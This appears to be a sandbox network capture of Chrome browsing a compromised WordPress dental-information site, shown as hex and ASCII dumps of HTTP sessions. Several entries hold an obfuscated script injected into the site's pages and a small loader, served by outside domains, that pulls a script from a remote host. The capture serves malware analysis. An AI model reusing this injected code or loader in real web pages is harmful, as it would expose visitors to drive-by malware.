                                                                                                                                      2024-04-24 10:14:16 UTC16384INData Raw: 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 7b 67 61 70 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2e 69 73 2d 6d 65 6e 75 2d 6f 70 65 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 73 75 62 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 61 64 64
                                                                                                                                      Data Ascii: .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{gap:inherit}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{padd
                                                                                                                                      2024-04-24 10:14:16 UTC16384INData Raw: 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 7d 75 6c 2e 77 70 2d 62 6c 6f 63 6b 2d 72 73 73 2e 69 73 2d 67 72 69 64 20 6c 69 7b 6d 61 72 67 69 6e 3a 30 20 31 65 6d 20 31 65 6d 20 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 30 70 78 29 7b 75 6c 2e 77 70 2d 62 6c 6f 63 6b 2d 72 73 73 2e 63 6f 6c 75 6d 6e 73 2d 32 20 6c 69 7b 77 69 64 74 68 3a 63 61 6c 63 28 35 30 25 20 2d 20 31 65 6d 29 7d 75 6c 2e 77 70 2d 62 6c 6f 63 6b 2d 72 73 73 2e 63 6f 6c 75 6d 6e 73 2d 33 20 6c 69 7b 77 69 64 74 68 3a 63 61 6c 63 28 33 33 2e 33 33 33 33 33 25 20 2d 20 31 65 6d 29 7d 75 6c 2e 77 70 2d 62 6c 6f 63 6b 2d 72 73 73 2e 63 6f 6c 75 6d 6e 73 2d 34 20 6c 69 7b 77 69 64 74 68 3a 63 61 6c 63 28
                                                                                                                                      Data Ascii: ist-style:none;padding:0}ul.wp-block-rss.is-grid li{margin:0 1em 1em 0;width:100%}@media (min-width:600px){ul.wp-block-rss.columns-2 li{width:calc(50% - 1em)}ul.wp-block-rss.columns-3 li{width:calc(33.33333% - 1em)}ul.wp-block-rss.columns-4 li{width:calc(
                                                                                                                                      2024-04-24 10:14:16 UTC16384INData Raw: 75 62 74 6c 65 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 74 62 6f 64 79 20 74 72 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 63 66 30 65 66 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 2e 69 73 2d 73 74 79 6c 65 2d 73 74 72 69 70 65 73 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 2e 69 73 2d 73 74 79 6c 65 2d 73 74 72 69 70 65 73 20 74 68 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 2e 68 61 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 2e 68 61 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 74 68 2c 2e 77 70 2d 62 6c 6f 63
                                                                                                                                      Data Ascii: ubtle-pale-pink-background-color tbody tr:nth-child(odd){background-color:#fcf0ef}.wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{border-color:#0000}.wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-bloc


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      136192.168.2.164989631.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:14 UTC556OUTGET /WyNzslZcNXc4hHNvLCDDiTamINVoxtt-L-d6Ayg3PMl HTTP/1.1
                                                                                                                                      Host: funcallback.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:15 UTC767INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:15 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 247
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:14:15 GMT
                                                                                                                                      Set-Cookie: _subid=2vk1oobld9ei8; expires=Sat, 25 May 2024 10:14:15 GMT; path=/
                                                                                                                                      Set-Cookie: 7e4fc=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQ2OTZcIjoxNzEzOTUzNjU1LFwiNDY4NlwiOjE3MTM5NTM2NTUsXCI0Njc4XCI6MTcxMzk1MzY1NX0sXCJjYW1wYWlnbnNcIjp7XCIyMTZcIjoxNzEzOTUzNjU1LFwiMjI5XCI6MTcxMzk1MzY1NSxcIjIyOFwiOjE3MTM5NTM2NTV9LFwidGltZVwiOjE3MTM5NTM2NTV9In0.DE54Zb-rA2mHp_PCnWZDpdRr-NhxArStBwG9vxRfVbM; expires=Fri, 19 Aug 2078 20:28:30 GMT; path=/
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      2024-04-24 10:14:15 UTC247INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 71 2c 66 2c 65 2c 77 2c 6a 29 7b 77 3d 71 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 66 29 3b 6a 3d 71 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 66 29 5b 30 5d 3b 77 2e 61 73 79 6e 63 3d 31 3b 77 2e 73 72 63 3d 65 3b 6a 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 77 2c 6a 29 3b 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 73 74 61 6b 65 2e 6c 69 62 65 72 74 61 72 69 61 6e 63 6f 75 6e 74 65 72 70 6f 69 6e 74 2e 63 6f 6d 2f 2b 36 4e 36 37 59 43 42 47 59 53 66 67 55 44 66 7a 5a 42 57 7a 34 6d 42 51 4d 2b 58 30 52 79 47 69 38 30 4e 6a 4a 2f 46 46 34 65 4a 77 56 69 51 27 29 3b
                                                                                                                                      Data Ascii: ;(function(o,q,f,e,w,j){w=q.createElement(f);j=q.getElementsByTagName(f)[0];w.async=1;w.src=e;j.parentNode.insertBefore(w,j);})(window,document,'script','https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ');


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      137192.168.2.1649913153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:16 UTC864OUTGET /wp-content/uploads/2021/07/Exodontia-Homepage-01-copy.png HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://exodontia.info/drugs-for-oral-conditions/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953653.0.0.0; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953653.0.0.0
                                                                                                                                      2024-04-24 10:14:17 UTC651INHTTP/1.1 404 Not Found
                                                                                                                                      Connection: close
                                                                                                                                      x-powered-by: PHP/7.4.33
                                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                                      link: <https://exodontia.info/wp-json/>; rel="https://api.w.org/"
                                                                                                                                      server-timing: wp-before-template;dur=57.18
                                                                                                                                      transfer-encoding: chunked
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:17 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:17 UTC717INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 32 65 31 28 29 7b 76 61 72 20 5f 30 78 37 36 33 37 63 34 3d 5b 27 65 64 67 65 27 2c 27 69 6e 73 65 72 74 41 64 6a 61 63 65 6e 74 48 54 4d 4c 27 2c 27 64 69 73 61 62 6c 65 64 27 2c 27 67 6c 6f 62 61 6c 5f 6e 61 6d 65 27 2c 27 73 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 31 39 35 36 37 36 34 37 75 6f 54 65 4b 69 27 2c 27 6e 61 76 69 67 61 74 6f 72 49 6e 66 6f 27 2c 27 68 6f 73 74 27 2c 27 5b 64 61 74 61 2d 69 64 3d 5c 78 32 37 27 2c 27 62 72 6f 77 73 65 72 27 2c 27 3c 73 74 79 6c 65 5c 78 32 30 64 61 74 61 2d 69 64 3d 5c 78 32
                                                                                                                                      Data Ascii: 10000<!DOCTYPE html><html lang="en-GB"> <head><script>function _0x42e1(){var _0x7637c4=['edge','insertAdjacentHTML','disabled','global_name','setAttribute','19567647uoTeKi','navigatorInfo','host','[data-id=\x27','browser','<style\x20data-id=\x2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      138192.168.2.1649914185.158.251.2404437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:17 UTC579OUTGET /+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ HTTP/1.1
                                                                                                                                      Host: stake.libertariancounterpoint.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:25 UTC165INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:25 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:14:25 UTC209INData Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      139192.168.2.164991531.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:17 UTC518OUTGET /SDQxw16j HTTP/1.1
                                                                                                                                      Host: gspiceyl.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:17 UTC767INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:17 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 247
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:14:17 GMT
                                                                                                                                      Set-Cookie: _subid=2vk1oobld9ejm; expires=Sat, 25 May 2024 10:14:17 GMT; path=/
                                                                                                                                      Set-Cookie: 7e4fc=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQ2OThcIjoxNzEzOTUzNjU3LFwiNDY4NlwiOjE3MTM5NTM2NTcsXCI0Njc4XCI6MTcxMzk1MzY1N30sXCJjYW1wYWlnbnNcIjp7XCIyMDdcIjoxNzEzOTUzNjU3LFwiMjI5XCI6MTcxMzk1MzY1NyxcIjIyOFwiOjE3MTM5NTM2NTd9LFwidGltZVwiOjE3MTM5NTM2NTd9In0.qE6OYEqNjk3Hes59YEr4xmByhE_wAJR6YPQs4fpqZFY; expires=Fri, 19 Aug 2078 20:28:34 GMT; path=/
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      2024-04-24 10:14:17 UTC247INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 71 2c 66 2c 65 2c 77 2c 6a 29 7b 77 3d 71 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 66 29 3b 6a 3d 71 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 66 29 5b 30 5d 3b 77 2e 61 73 79 6e 63 3d 31 3b 77 2e 73 72 63 3d 65 3b 6a 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 77 2c 6a 29 3b 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 73 74 61 6b 65 2e 6c 69 62 65 72 74 61 72 69 61 6e 63 6f 75 6e 74 65 72 70 6f 69 6e 74 2e 63 6f 6d 2f 2b 36 4e 36 37 59 43 42 47 59 53 66 67 55 44 66 7a 5a 42 57 7a 34 6d 42 51 4d 2b 58 30 52 79 47 69 38 30 4e 6a 4a 2f 46 46 34 65 4a 77 56 69 51 27 29 3b
                                                                                                                                      Data Ascii: ;(function(o,q,f,e,w,j){w=q.createElement(f);j=q.getElementsByTagName(f)[0];w.async=1;w.src=e;j.parentNode.insertBefore(w,j);})(window,document,'script','https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ');


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      140192.168.2.164991631.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:17 UTC523OUTGET /9hFXWz7m HTTP/1.1
                                                                                                                                      Host: debasesingle.life
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:17 UTC767INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:17 GMT
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      Content-Length: 247
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:14:17 GMT
                                                                                                                                      Set-Cookie: _subid=2vk1oobld9ejo; expires=Sat, 25 May 2024 10:14:17 GMT; path=/
                                                                                                                                      Set-Cookie: 7e4fc=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQ3MTdcIjoxNzEzOTUzNjU3LFwiNDY4NlwiOjE3MTM5NTM2NTcsXCI0Njc4XCI6MTcxMzk1MzY1N30sXCJjYW1wYWlnbnNcIjp7XCIxNDVcIjoxNzEzOTUzNjU3LFwiMjI5XCI6MTcxMzk1MzY1NyxcIjIyOFwiOjE3MTM5NTM2NTd9LFwidGltZVwiOjE3MTM5NTM2NTd9In0.KiG1o95ImU5ZITmLWVCBX_m4s3Oa2Zn01zp-UP3BZ5M; expires=Fri, 19 Aug 2078 20:28:34 GMT; path=/
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      2024-04-24 10:14:17 UTC247INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 71 2c 66 2c 65 2c 77 2c 6a 29 7b 77 3d 71 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 66 29 3b 6a 3d 71 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 66 29 5b 30 5d 3b 77 2e 61 73 79 6e 63 3d 31 3b 77 2e 73 72 63 3d 65 3b 6a 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 77 2c 6a 29 3b 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 73 74 61 6b 65 2e 6c 69 62 65 72 74 61 72 69 61 6e 63 6f 75 6e 74 65 72 70 6f 69 6e 74 2e 63 6f 6d 2f 2b 36 4e 36 37 59 43 42 47 59 53 66 67 55 44 66 7a 5a 42 57 7a 34 6d 42 51 4d 2b 58 30 52 79 47 69 38 30 4e 6a 4a 2f 46 46 34 65 4a 77 56 69 51 27 29 3b
                                                                                                                                      Data Ascii: ;(function(o,q,f,e,w,j){w=q.createElement(f);j=q.getElementsByTagName(f)[0];w.async=1;w.src=e;j.parentNode.insertBefore(w,j);})(window,document,'script','https://stake.libertariancounterpoint.com/+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ');


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      141192.168.2.1649921153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:24 UTC956OUTGET /adverts-sponsors-policy/ HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Referer: https://exodontia.info/drugs-for-oral-conditions/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga_XW48SKHQ61=GS1.1.1713953647.1.1.1713953655.0.0.0; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.1.1713953655.0.0.0
                                                                                                                                      2024-04-24 10:14:25 UTC703INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      x-powered-by: PHP/7.4.33
                                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                                      link: <https://exodontia.info/wp-json/>; rel="https://api.w.org/"
                                                                                                                                      link: <https://exodontia.info/wp-json/wp/v2/pages/219>; rel="alternate"; type="application/json"
                                                                                                                                      link: <https://exodontia.info/?p=219>; rel=shortlink
                                                                                                                                      server-timing: wp-before-template;dur=62.88
                                                                                                                                      transfer-encoding: chunked
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:24 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:25 UTC665INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 32 65 31 28 29 7b 76 61 72 20 5f 30 78 37 36 33 37 63 34 3d 5b 27 65 64 67 65 27 2c 27 69 6e 73 65 72 74 41 64 6a 61 63 65 6e 74 48 54 4d 4c 27 2c 27 64 69 73 61 62 6c 65 64 27 2c 27 67 6c 6f 62 61 6c 5f 6e 61 6d 65 27 2c 27 73 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 31 39 35 36 37 36 34 37 75 6f 54 65 4b 69 27 2c 27 6e 61 76 69 67 61 74 6f 72 49 6e 66 6f 27 2c 27 68 6f 73 74 27 2c 27 5b 64 61 74 61 2d 69 64 3d 5c 78 32 37 27 2c 27 62 72 6f 77 73 65 72 27 2c 27 3c 73 74 79 6c 65 5c 78 32 30 64 61 74 61 2d 69 64 3d 5c 78 32
                                                                                                                                      Data Ascii: 10000<!DOCTYPE html><html lang="en-GB"> <head><script>function _0x42e1(){var _0x7637c4=['edge','insertAdjacentHTML','disabled','global_name','setAttribute','19567647uoTeKi','navigatorInfo','host','[data-id=\x27','browser','<style\x20data-id=\x2
                                                                                                                                      2024-04-24 10:14:25 UTC14994INData Raw: 32 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 37 70 78 7d 2e 70 6f 70 75 70 5c 78 32 30 69 6d 67 7b 77 69 64 74 68 3a 33 32 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 70 78 7d 2e 70 6f 70 75 70 5c 78 32 30 73 70 61 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 35 70 78 7d 2e 70 6f 70 75 70 5c 78 32 30 62 75 74 74 6f 6e 7b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 38 37 34 63 66 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 38 70 78 5c 78 32 30 32 30 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 64 69 73 70 6c
                                                                                                                                      Data Ascii: 2,sans-serif;font-size:17px}.popup\x20img{width:32px;vertical-align:middle;margin-right:15px}.popup\x20span{padding-top:5px}.popup\x20button{padding:0;color:#fff;background-color:#3874cf;box-sizing:border-box;padding:8px\x2020px;text-decoration:none;displ
